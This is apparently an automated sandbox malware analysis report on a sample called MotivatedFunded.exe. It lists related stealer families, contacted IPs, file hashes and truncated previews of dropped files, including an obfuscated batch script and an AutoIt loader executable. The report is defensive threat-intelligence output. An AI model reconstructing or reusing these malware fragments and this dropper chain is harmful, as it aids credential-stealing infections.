                                              2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\755831\Dl.comActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                                mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                  1E3Vcm2yrA.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                      c.htaGet hashmaliciousRemcosBrowse
                                                        c2.htaGet hashmaliciousRemcosBrowse
                                                          c2.htaGet hashmaliciousRemcosBrowse
                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                Setup.exeGet hashmaliciousLummaCBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\755831\Dl.com

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: ActiVe_Ver_Set-UpFilE.exe, Detection: malicious, Browse
                                                                  • Filename: mNPTwHOuvT.exe, Detection: malicious, Browse
                                                                  • Filename: 1E3Vcm2yrA.exe, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_37.4.exe, Detection: malicious, Browse
                                                                  • Filename: c.hta, Detection: malicious, Browse
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\755831\g

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):497159
                                                                  Entropy (8bit):7.999580894280772
                                                                  Encrypted:true
                                                                  SSDEEP:12288:AJ6TmuIkMEB3qhyjzNX7x0wnfx5Hq2BQ2zcXNHlBx:AJumuIzEB3qhyPlr55B54XNHTx
                                                                  MD5:F604E16F02AB3AC60184F4655670B591
                                                                  SHA1:38DBADDA26C8D4C9742AA87EF3521D264692ABB8
                                                                  SHA-256:62A1FBB8F3EF52A25EA2CBFB63769ACFA474C088428F2E63BE5683DDC4CDB7FC
                                                                  SHA-512:48507D3A7E760C9CF5AF5AE02E2F0C320382BF7F30790138C70F6866AE20A73402BA54E3AC76B0FFCC2030B865DD8340A602A92EC7E13E7353C1454B1BF10FD6
                                                                  Malicious:false
                                                                  Preview:G;m..>...7.1..i...........,.'E..z..;..>C.Z6+....G.}FW.q..#~j.H.M.g.....U.#,...X6.Q.Bp.....{n.>..`.........`%...Pm..D....IUgU;y.C.^....dT.........y.=.4......z....5[9..A...F..Xy.g.[.&.):...=...Sd....C.,[.F+.Z.',..0p..1...eO._..........n.....x..8...N..p..y.cRg;.y.rPvR.N.J&..uI..P....I../..{E.\.M.hlP...CI..2.{T..\]z...X..0G...z.'..M..;K^M.}+.V..3..?.a....|th.<...J.i.?.l.@$.....{..E9Q....Y.AM.....^.|...e@.....a.qg.....w`.._.GS....j..g.{.3M@:|.X8A.QB.[..H...[C5...c.x....L.7%7.....J.o...UH"vR..&&.{..x.S5...."...=h.L....sa..\.....9.......2a.x...W....).|x...l.#9....y....@.[....$....r}...|0.(e...6. G.V..|........L..&.Z..NJd1..j+..9.aB.0.._u........../$[X=....(..c.../...a..O.weK"@.]E.o......3Q7`(s.<.g.).{.*.O..odL.w...Q'.(.-.....w....3-MQ.=......es.?..MM^g.o./.b...JL6.n...j..F/)..J..2...Iz.Iaak%e.....@...?..:..PkLDZ3%M2b.qm ...<.G=.f......Io...@.:..?.. .u.:5.)7../.e..lkR...K.\..a....AM.....lEw.....R..M...bi..Akz..z1.....xR.E~.K.....@.&6q..

                                                                  C:\Users\user\AppData\Local\Temp\Appropriate

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):7687
                                                                  Entropy (8bit):7.9731647255711104
                                                                  Encrypted:false
                                                                  SSDEEP:192:q8Kul0otQDMcOAwUK1NlJ4Fw+oZ3gVWIyFHOXe:q8bl0YiXwUIJ4FsgEYe
                                                                  MD5:C3679DEA7E095FA91B055D64DD6D75F3
                                                                  SHA1:8614F40F2A78D0C972D970A7255603025DC7E3C9
                                                                  SHA-256:FC097763CB380FB6D4F91555548A5BBFE4A4387D936FC516439B09EC31B81486
                                                                  SHA-512:0374C37FE52EFDED4D74AC2F1B3D39EF918F0F22CE10185DB839C76EDFFC453305DFB4EDD10E5D2DCDF12F2E1FECD9955DCA315F9607F0FA7C252C8CEAEABC26
                                                                  Malicious:false
                                                                  Preview:.B.K.N9...L..%}.wi..p.].Q....|;....Ek"..'.....I=...J..&6..i.c_..I..I..}t..K.,.m6.Lq{.L.%.9....$..G.v.;.%Nr.0....2x... BxAS...../...I.,..f0.Y.7.&m?..L..t.V$,Q........._..6$..C.......p).......5.........=.. .Nl.$......h..`....UR.H7..a]^.f...0.ik.,.f.P|Q..,....>p...r...0....._.I@....r...N...< ..H@.5....Y......_2y.5....<.]./.+....T.C.F..e...n...A..h.:.R....Kd..ur..Iq..1.!<.G....%.eRp..".i.....e.O%.$....:+..p.....`.%r..C..<.b.....y3.~.0yp...../.).y..oZ...V0.$i.<........d.!.`j..7...."p.9SL.P...1,...~{}ZG..h.|).q...o....9K[$'..F.k.DL..#Tj%&a..I...O..yq.Xb..t1e^...L&..c...'.6.K^w.....^.#H{..>`.R._...C.%Jn.`..v!.H.r.t,2...MpR].fu...R5.m...1..$D..YO4....a.S..Br<..${5.h.........\..L`....EO2.U...<.'....d..s.7..$.-.T..W.)_...&.....*s3.R..)7<.E...E...f...W...T.....5....f)}..1e....QUf..{E...m#...b.........5.O.9!...{+Q..z=..I..].........L.D... .W.pB.....#......cMx.lY..C.....i..r......U...f.L>..+.}.........G...9.[J.!....|...&J.)..X..=..#.*9.9..

                                                                  C:\Users\user\AppData\Local\Temp\Bangladesh

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):2040
                                                                  Entropy (8bit):5.035548695751988
                                                                  Encrypted:false
                                                                  SSDEEP:48:2k9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq15:2oSEA5O5W+MfH5SD
                                                                  MD5:6D7ED559499AC1D17944E190AE1AAB13
                                                                  SHA1:B8E6A57B2F7592A01838C33F1BF6BE63449A2FE0
                                                                  SHA-256:94773A7D9FB62636D728A5906F1CE59560587EE8D966C61EA63A69290F760249
                                                                  SHA-512:7743F1C52018CBB139819B57C46640208FDF5E94F59FFEC8863EF9D989EE86AF0A7B61BF373EC905FBAEC67C15504EC6B8DB863A3E638540BE7C9515A901FF3E
                                                                  Malicious:false
                                                                  Preview:jerusalem........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.......................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\Barbados

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):93184
                                                                  Entropy (8bit):5.329519226241246
                                                                  Encrypted:false
                                                                  SSDEEP:768:tUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+9BGmd:thxjgarB/5el3EYrDWyu0uZo2+9BGmd
                                                                  MD5:47B137544ECB2994B7BA50FA90FC4789
                                                                  SHA1:170121935D449F1E51008FFBCB03DD55E29B0359
                                                                  SHA-256:5E918B5D930D639688F1C9BDD01DB6D665FEE454842A7A411989B34DB63598AC
                                                                  SHA-512:71D1A65F919385194DBF8361C49BEBD8951C460720DE9730047C80EE5C96B524724786FF26987350F95E764A76CF720FC90F729E430498D8D5D02812BDF920B7
                                                                  Malicious:false
                                                                  Preview:C................................................UGP.........text$di.............text$lp00AutoIt3.......['...text$mn.....'.......text$np....3'..6....text$x.i'.......text$yd.....(.......text$zy........s....text$zz.............idata$5.............00cfg...........CRT$XCA.............CRT$XCAA............CRT$XCL........(....CRT$XCU.............CRT$XCZ.............CRT$XIA.............CRT$XIAA............CRT$XIAC............CRT$XIC.............CRT$XIZ.............CRT$XLA.............CRT$XLZ.............CRT$XPA.............CRT$XPX.............CRT$XPXA............CRT$XPZ.............CRT$XTA.............CRT$XTZ.... ...`G...rdata... ..P#...rdata$00....C.......rdata$T.....C..x....rdata$r....`E...L...rdata$zz... ...l....rdata$zzzdbg............rtc$IAA.............rtc$IZZ.............rtc$TAA.............rtc$TZZ.............tls.............tls$............tls$ZZZ.............xdata$x........h....idata$2............idata$3.............idata$4.........#...idata$6........p....data...p....9...data$00...

                                                                  C:\Users\user\AppData\Local\Temp\Brighton

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):77824
                                                                  Entropy (8bit):7.997702576026586
                                                                  Encrypted:true
                                                                  SSDEEP:1536:9nI9VwUOPDfpE4U5vkv19m5tHuNcRMZowokUO0JjBgw0lvdfbb:9nOzrvkbMO6RQok/0J1gdvdfbb
                                                                  MD5:21F69D9BF8325AA9D291E4383CCEF80B
                                                                  SHA1:34407A6E7F7F6758809FF56255F351D8B5153E14
                                                                  SHA-256:7C5F4498AC1D534BEB892C169C8CF030760C96CF112354EB6866A4492572C745
                                                                  SHA-512:F2F049BFE1EE7D42A3719A524DFA0FF6A8187A45DB0B6C97218513FDDF27BCC4683A7263100CC5AA727BD144883A49E4250C5DB96A9B92BF7279FD18A5258AE3
                                                                  Malicious:false
                                                                  Preview:.x.i.!<).cG.,./..W.....G.dx...*.'e.w.].@Da.ZO...w.G.......XY........S...'..R."...hs5.(.A#...==3...n......?......K.c..5K..*G.8(.?..3.].L..E7.#..DG......:...50..'.,3.. F.nH..g.e...I.\..p;&P._..[....3e.!...[..E.=...#..6.^.Pr%.......T3R.?[.........e#...qX..XL..~....?h.r.....EH..4Apx.U...].=.>.O.<`.0"T'.Dg....=.>.!g.H.\........#M('S.-..4....>...m6........z..!&..Wd..PQM........E-.V..Y.N{Ih....X....]!c=..l..,...Z7.|....~........K.Y'+.V..? .X... .a...E...`e....'B.Qd..S*...;..8..%WN;=..FP...2~:....{'L.>_..'.$Z7z.._....1=.../Z.....#S.=#......MwqLN..pZcAU.7. ...kH.E)Nv..{.Te........z:'.8,.....t.?....?.>..f%RGmTw....+......x.ND....wNr..q.'~.R.^..C..=:\p3h<.Zf^.:.V......v....Y....{Q..)S]^..{et0.{..^.X.Dx^.M...rE=...@...;.A[..0...[.yJrj!.....}.B......[..=I..m.Z..w.?".bv.vs.R{z.m.......h.'.7.;>.....e|..k...].....8.....F....^k.k..t.......\.`..&...mK.;v..r....o.(.f..^Z."........0..:......cJ.... w.. .`.u..............d.R....*.(i....'.Z..]JQ..,'.

                                                                  C:\Users\user\AppData\Local\Temp\Calculator

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:ASCII text, with very long lines (1084), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):21866
                                                                  Entropy (8bit):5.133729797156198
                                                                  Encrypted:false
                                                                  SSDEEP:384:THZp8R7C9sib9aJNNWLw40Aocdhbgg2YQfPxQ5G2rWWHWLKTe2eC6vsvCbV4sEn:lp8k9dR6EpUcdhMJ3qU2rWqZpj2PO
                                                                  MD5:79F1E83F31CFB9C5098EF121E7D705F1
                                                                  SHA1:2601B85C7FAF5BC15446E03792141F064CA8AECF
                                                                  SHA-256:CED786F115FDCEC9D438A173C2845BF6DC6F791B4C7A6147199FFB0CF8A9511B
                                                                  SHA-512:ABE97329BC866F7FEA6D814F95A803D80CA564FE84D9676BE95EB9D12615188496BC90445BF8DB996B6CC2D9EB2BCE5B69253FC67889D498D64F3FFD574CF3B8
                                                                  Malicious:false
                                                                  Preview:Set Stopping=v..ZqMcCompatibility-Wv-Pieces-Dishes-Floral-Vacuum-..KtCqApparel-Tend-..PSTDrag-Karl-Prix-Instrumental-Proper-Surplus-Injury-..vaFsCome-Frog-Vaccine-Known-Happen-Dental-Syracuse-Aboriginal-..vHEkHook-Carnival-Everyone-City-Challenged-Bush-Aug-Chair-Cedar-..BYxCity-Enemies-Fitted-Ip-Consideration-Constraints-Univ-Pond-Uses-..xFqIAside-Arbitration-Survivor-Keys-Terror-..HuInteractions-Crm-..wkbYStewart-Whatever-Spent-Lips-..Set Late=1..BzxgUnsubscribe-Ranked-Ati-..SKwBankruptcy-Dealers-Streams-Broke-Establish-William-Prove-Offset-Glory-..WVlAdvanced-..eZtPQuite-Removed-Persons-Right-Participation-Snap-Af-Bringing-Nr-..LODegree-Profile-Assurance-Holdem-Nationally-Primary-..Set Duke=M..odLMakeup-Webmaster-Concerts-Together-Feed-Fuck-Epson-Pe-Classifieds-..bKPfObvious-Inspections-Fuzzy-Month-Leslie-Conferences-Modem-..QAuExchange-Frog-Aid-Partnership-..gbsFormat-Yemen-Booty-Adidas-Mhz-Treo-Establish-Sbjct-Loop-..UgbTScale-..kLYFHam-Cope-America-Worried-..ijHip-Floyd-Warehouse-

                                                                  C:\Users\user\AppData\Local\Temp\Calculator.cmd (copy)

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with very long lines (1084), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):21866
                                                                  Entropy (8bit):5.133729797156198
                                                                  Encrypted:false
                                                                  SSDEEP:384:THZp8R7C9sib9aJNNWLw40Aocdhbgg2YQfPxQ5G2rWWHWLKTe2eC6vsvCbV4sEn:lp8k9dR6EpUcdhMJ3qU2rWqZpj2PO
                                                                  MD5:79F1E83F31CFB9C5098EF121E7D705F1
                                                                  SHA1:2601B85C7FAF5BC15446E03792141F064CA8AECF
                                                                  SHA-256:CED786F115FDCEC9D438A173C2845BF6DC6F791B4C7A6147199FFB0CF8A9511B
                                                                  SHA-512:ABE97329BC866F7FEA6D814F95A803D80CA564FE84D9676BE95EB9D12615188496BC90445BF8DB996B6CC2D9EB2BCE5B69253FC67889D498D64F3FFD574CF3B8
                                                                  Malicious:false
                                                                  Preview:Set Stopping=v..ZqMcCompatibility-Wv-Pieces-Dishes-Floral-Vacuum-..KtCqApparel-Tend-..PSTDrag-Karl-Prix-Instrumental-Proper-Surplus-Injury-..vaFsCome-Frog-Vaccine-Known-Happen-Dental-Syracuse-Aboriginal-..vHEkHook-Carnival-Everyone-City-Challenged-Bush-Aug-Chair-Cedar-..BYxCity-Enemies-Fitted-Ip-Consideration-Constraints-Univ-Pond-Uses-..xFqIAside-Arbitration-Survivor-Keys-Terror-..HuInteractions-Crm-..wkbYStewart-Whatever-Spent-Lips-..Set Late=1..BzxgUnsubscribe-Ranked-Ati-..SKwBankruptcy-Dealers-Streams-Broke-Establish-William-Prove-Offset-Glory-..WVlAdvanced-..eZtPQuite-Removed-Persons-Right-Participation-Snap-Af-Bringing-Nr-..LODegree-Profile-Assurance-Holdem-Nationally-Primary-..Set Duke=M..odLMakeup-Webmaster-Concerts-Together-Feed-Fuck-Epson-Pe-Classifieds-..bKPfObvious-Inspections-Fuzzy-Month-Leslie-Conferences-Modem-..QAuExchange-Frog-Aid-Partnership-..gbsFormat-Yemen-Booty-Adidas-Mhz-Treo-Establish-Sbjct-Loop-..UgbTScale-..kLYFHam-Cope-America-Worried-..ijHip-Floyd-Warehouse-

                                                                  C:\Users\user\AppData\Local\Temp\Claim

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):68608
                                                                  Entropy (8bit):7.997110004846612
                                                                  Encrypted:true
                                                                  SSDEEP:768:wkPTa6BysMKbm8nJLhvMjOuMJlFMyMf57X9hdToZcUnOx5mi01/n4X0KGB6Wwhlb:wwxBZm8HXJPPeXScUOx5mN/4RCAf5J8I
                                                                  MD5:775CF5C3A5CF9AB71A6F7670FC9B4D38
                                                                  SHA1:1E3617ED84B319E3AEE3BF3EBC52AB54A28C6778
                                                                  SHA-256:9A677D958D183CB1B4E3309A4AC22D7A990FDD2A25CF116A3990C3174D4E1969
                                                                  SHA-512:7316593F19633416CF85FF2979B40CFB1E837E99B7CCCB1B80800ECC4B8E473245349A6A5F4EDEAEB4E22974B58725D7206C1A33C692729E84CAC6EBBF46C975
                                                                  Malicious:false
                                                                  Preview:[..z.4+=..D.<..6{..A$.G...1............|. ..27]gk.e..~t..}%K.........>...7.`7.....H.O.wT./`..d1WO^...Y..a..Y.X.=K?4..i....9.l.....y"...X..e9..x.....F.......qc.6.6.?..l~..U........)V.....Ug.&....._..:.._.....z..qd.,...o.^.RPqD...........x..O....Ae3v...&,.........._$y...~v\....\.$\Pi.6.8...d?.......P.....1..t8.M_..Q.")e..~..?...5^..M.....j..H.3&......4...j.o.o.G..s........P.7..Sp/RJD....e.S...i.,...W!.d9.S.....r........E.....E.CR..3......>....Y.A.Jt..-.6..;I..mP..5&.<....Ef.B.4XY...;k7........@7e.^).....W....-v.=.nc..j...K0.X..Q.A....w.A.Y.o..S..J.......{...7.=./$.lD.j.\.}.Qb9BqH.]W..k.....c=.....{FKy.R$..W...IF....k.....,..zE.MWg"wy...7..rZ..l.M..e<.Fc..uh.l.P..!...G.3.\..b&k.o*.....FC.g...\.....,..*..p.<..9+.<.....x&..M.>..)......P..........c...q(..A$.rPD.u*.,.....a.e...@...d.}SlEw......-z.[..`..PYW(vM{..a...o.5.3..>..!.Q....2 .u...c.c]........'.\..)..:Z.p....o.u..Y.P.6.9_...&.. .....w...dNJ...uE.V`(.......LC'4.s.....J1.gC.%..;P......N.

                                                                  C:\Users\user\AppData\Local\Temp\Delhi

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:Microsoft Cabinet archive data, 490266 bytes, 10 files, at 0x2c +A "Garmin" +A "Warriors", ID 6331, number 1, 29 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):490266
                                                                  Entropy (8bit):7.998578152880399
                                                                  Encrypted:true
                                                                  SSDEEP:12288:YEaVgjX8V7DNgDhE7X5mp6ANY05YaFFrqLFUYZ+VqN+V:YDVgQaDC7pM6AS2YwrqLZZ+VqQV
                                                                  MD5:3BC68904D45AA890C186549300FC4D80
                                                                  SHA1:FAC2AF519A5469DADF92B0C5198825E22830FDB5
                                                                  SHA-256:3BE16D7C1EE17322A9824560B190D3BB452A07E4A0D0813180DB3767BE6580C6
                                                                  SHA-512:E40A0FA31F34D4DB55CA79CD795CD338C9D140A89A7AA3A6A3A2BBB5920ECE5418355280BE46457D3FB2D0C20B7BE0C1FC20C5DCC11A1423DF3DC05D13CF3209
                                                                  Malicious:false
                                                                  Preview:MSCF.....{......,............................8........-Z8J .Garmin......8....-Z8J .Warriors.i....H....-Z8J .Sv.....i.....-Z8J .Spas..l..ip....-Z8J .Barbados.....i.....-Z8J .Bangladesh.....a.....-Z8J .Msg.....a.....-Z8J .Douglas..8..a.....-Z8J .Frederick..@..a4....-Z8J .Sport.X..P.O..CK.}.|S....\...&H..Q.DEA......4m....&T(..jwu.1.....F{9.1..<S....G.2...xh....V.Y....=........wn...y.=..4.......^............u.N%.L...=M&.).Z.`e.z%.....&u...H8...7/K.I_&.....}z<...#|........../..... ./Y..d~.58.UIkW.8..*o...6.P..c$......%yfV....e...b&hN.H....G.....%*..,..v[.%2..YR.~n..z.~p.......<P].o.[....j.'j>.BP,@#......".&.x.....x......}./.....\r.........,.)n^~....n2=..c..e....z......0...+...a.|..yl.....g.".[..7.sn..irF...6...^v..4(1C$.pN.?..E.X$......&~...nG.-e.,...:.:%3..H..L....`.........L.H..O....._{......)&...s..3L,.....a.....v......."...|.e..;.UA.7..j$.y.7.s.h....x.l ..CI...g.#.J#.7xHy.C..&8.VH.=.q...E .#.Nv...^j25F...V..j([G.4..N|(.....=.>.6tT/.V.......K`...6%..5.

                                                                  C:\Users\user\AppData\Local\Temp\Douglas

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64512
                                                                  Entropy (8bit):6.690377042480581
                                                                  Encrypted:false
                                                                  SSDEEP:1536:DqvI932eOypvcLSDOSpZ+Sh+I+FrbCyIN:Dqv+32eOyKODOSpQSAK
                                                                  MD5:C77AF262670E29488DD4A69F514988C6
                                                                  SHA1:E31396E975D126728BA789D4E98C4A46BE69C7CA
                                                                  SHA-256:CC00A8BF2AF08113E0F258308DF7F6F233F7D5825403CFEC4B1F4C2DA44C4EA4
                                                                  SHA-512:E2ADAE91FBD22D4C33BB4A5BE0CC44EEFF814AE176CFC4C49E0CFB65D841D544B9AF1ACC7E5CDD8F6E7C961A8CBF482F92FC222D8D32F60ED8326508DEC90719
                                                                  Malicious:false
                                                                  Preview:..............................`............@A..........\...;.u...t4..s......;.u....`.....A...\.....3....`.....\.....A...s............F;.....................P..`...Ph..........P.A..................................+................................<..!J..........................3.3......................F..;.u................ssY.............C.......s3.P..................P......h....P.r......2..,.................j...3.P..................P......h....P./..........................tz3..t...3.....................A;.u..tR..ss..............C.......1....................j.P......h....P................................9.}.+.j.3..d....^..3.A........`...........\...................&v.j&X....N!J...4.O!J............W..1............j.P..c.......P..........L!J....H.J.P........P.N........3.B...;..............uC3.P........\.........Ph......`...P.........\......................9.....u...........t.3.3..........`.......`......G..;.u........`.....\...A..\.........;.........`..........\......P....

                                                                  C:\Users\user\AppData\Local\Temp\Earliest

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):87040
                                                                  Entropy (8bit):7.997668500371939
                                                                  Encrypted:true
                                                                  SSDEEP:1536:flVZl1AmFBwZMUVhqINjPtXEwgwETsMJXzmjn0cmLkpoGCGoMEN2ypF:fzxizhqSPt0uETskzNfLkpoGcdL
                                                                  MD5:9EBC209950B0E45B4D652F710CB1F190
                                                                  SHA1:5F4AED5BC37A47FDE54F8F4462FC0AE40AD120F9
                                                                  SHA-256:C7DDCCF22C0D0E4D53F1B1DCD757748FC37AC77A34E2962729DED2F3207F127B
                                                                  SHA-512:EC2EBE7DF2D8E6B444F5FFA424F18973E44A84815F57606F1E1CD77F3E1F1A6D929FAE0E8AEBC3FDDCDD0CF6FCD170FD1915341A6B2B9F3D5AC9043ABAF9640E
                                                                  Malicious:false
                                                                  Preview:K.....MC....}:..>....&.. A....b..Y.*.E....\}.*......=d...V.....1..2.N.K>V....B..../..\C.9.>c.Z5`R.M..d....0...U=...?i.f<r.V.]h,....#C..K..2..._.......z.P.....hs....chl.m.]....m..oo#...vF...hJv...<y......Y.h.$.Q...2.#.....U_.t.5...T....~.f.r.'...<.6..K........Zr..$..<Uz..XZT.]"....o.K......UF........@..P.nw8...Q...oj.4...o.....=...^...k7.9#.......?.M1.=...(....a...8K(m.o.npK+0.J.....1.`6"...-.h.9..@.e..LN..GR.........1o......o.o%.)..ge..$.......%.!l.G.9.......}......6..iJ.f.0.r.]...iX..h.)+.@b.s.... ....DyU..Y.[@.......riD.e\o%.y.....:...4`;.;:Qt+.1)F......z.",.... G=.D?..$^..n..>...h$....P.+..oq...6..f..'...$...W..gU.... .ut.......X......p..t.p..D..-..a.p..sMp..G......b.?..........q0>.*..|.4..d...BE...S..}.9.;s.-....eO.|.:...V.?........(iD.9o..e..o....;..TDg..8.....a...R......1.v6B.^.j...VD.<...L%...:.j.....W..33G....p.!.......{Zc~S...t.JU....k,...5.P.].....)......p.......Q.e..f.OG.....^.x....tFSo~+.^.)..11m.Y.ykh...6b..y..+.`....'H..nT.<...+*.

                                                                  C:\Users\user\AppData\Local\Temp\Frederick

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):145408
                                                                  Entropy (8bit):5.7044909040339045
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Gcd0vtmgMbFuz08QuklMBNIimuzaAwusPdKaj6iTcPAs:neAg0Fuz08XvBNbjaAtsPh6
                                                                  MD5:76CF030B6B0AC6119F76C12D47E273EF
                                                                  SHA1:C14A9206D246FA7E92CB78D2153637D9B1123CC5
                                                                  SHA-256:2CD97944A3415A78B20D23BAF5B1139A0CD3DE8857ACE3AA44BD5F12BAFEE293
                                                                  SHA-512:52B2FA48701AC00A316E3FCC3CDDE8D10E825179698FEA4EAD7B0FA27B01BB6976D60E897738C22BEBB2ED35A7B9C4C8B5BF5F9C21B52D9E8A10D7161025C127
                                                                  Malicious:false
                                                                  Preview:.taJ......aJ......aJ......aJ.K....aJ......aJ......NJ......aJ......aJ......aJ......aJ......aJ......aJ......bJ......bJ......bJ.....(bJ.....4bJ.....@bJ.....LbJ.....XbJ.....dbJ.....pbJ.....|bJ......bJ......bJ.....XOJ.#....bJ.e....OJ.*....bJ.l...pOJ.&....bJ.h....NJ......bJ.L....OJ......bJ.s....NJ......bJ......bJ......bJ......cJ.M....cJ......cJ.....0PJ.>...$cJ......OJ.7...0cJ......NJ.....<cJ.N....OJ./...HcJ.t....OJ.....TcJ.....`cJ.Z....NJ.....lcJ.O....OJ.(...xcJ.j...@OJ......cJ.a....NJ......cJ.P....NJ......cJ......cJ.Q....NJ......cJ.R....OJ.-....cJ.r....OJ.1....cJ.x....PJ.:....cJ......NJ.....8PJ.?....cJ......cJ.S....OJ.2....dJ.y...hOJ.%....dJ.g...`OJ.$....dJ.f...$dJ......OJ.+...0dJ.m...<dJ.....(PJ.=...HdJ......PJ.;...TdJ......OJ.0...`dJ.....ldJ.w...xdJ.u....dJ.U....NJ......dJ......dJ.T....dJ......NJ......dJ......OJ.6....dJ.~....NJ......dJ.V....NJ......dJ.W....dJ......dJ......eJ......eJ......NJ..... eJ.X....OJ.....,eJ.Y... PJ.<...8eJ.....DeJ.....PeJ.v...\eJ......OJ.....heJ.[...POJ."...teJ.d..

                                                                  C:\Users\user\AppData\Local\Temp\Fw

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):79872
                                                                  Entropy (8bit):7.997820152818925
                                                                  Encrypted:true
                                                                  SSDEEP:1536:LLa4AHvduYdIwJ7BAYWY4kyIKpYeR61D5gNwqcIzhwbXCYQ7ARH+1Pj:BWvd9dfJaD+KpYeCZqP2yD8RHOPj
                                                                  MD5:867A0CD79112621022412A7E586E59FA
                                                                  SHA1:C62318669CA41922CAF3C4C55872EA41060347D2
                                                                  SHA-256:62883B154C501D943DEDA830A921B69A0B94452AF9282408760107AC820F2689
                                                                  SHA-512:B8BBB241337D689EFAE5EB755C8367CBB38C4F135FFD293D626EEA54F1D93FFBCD717EF1BC5E41DB249E94E0516262B8770A04B6ECB9842D5325F0590B9459C7
                                                                  Malicious:false
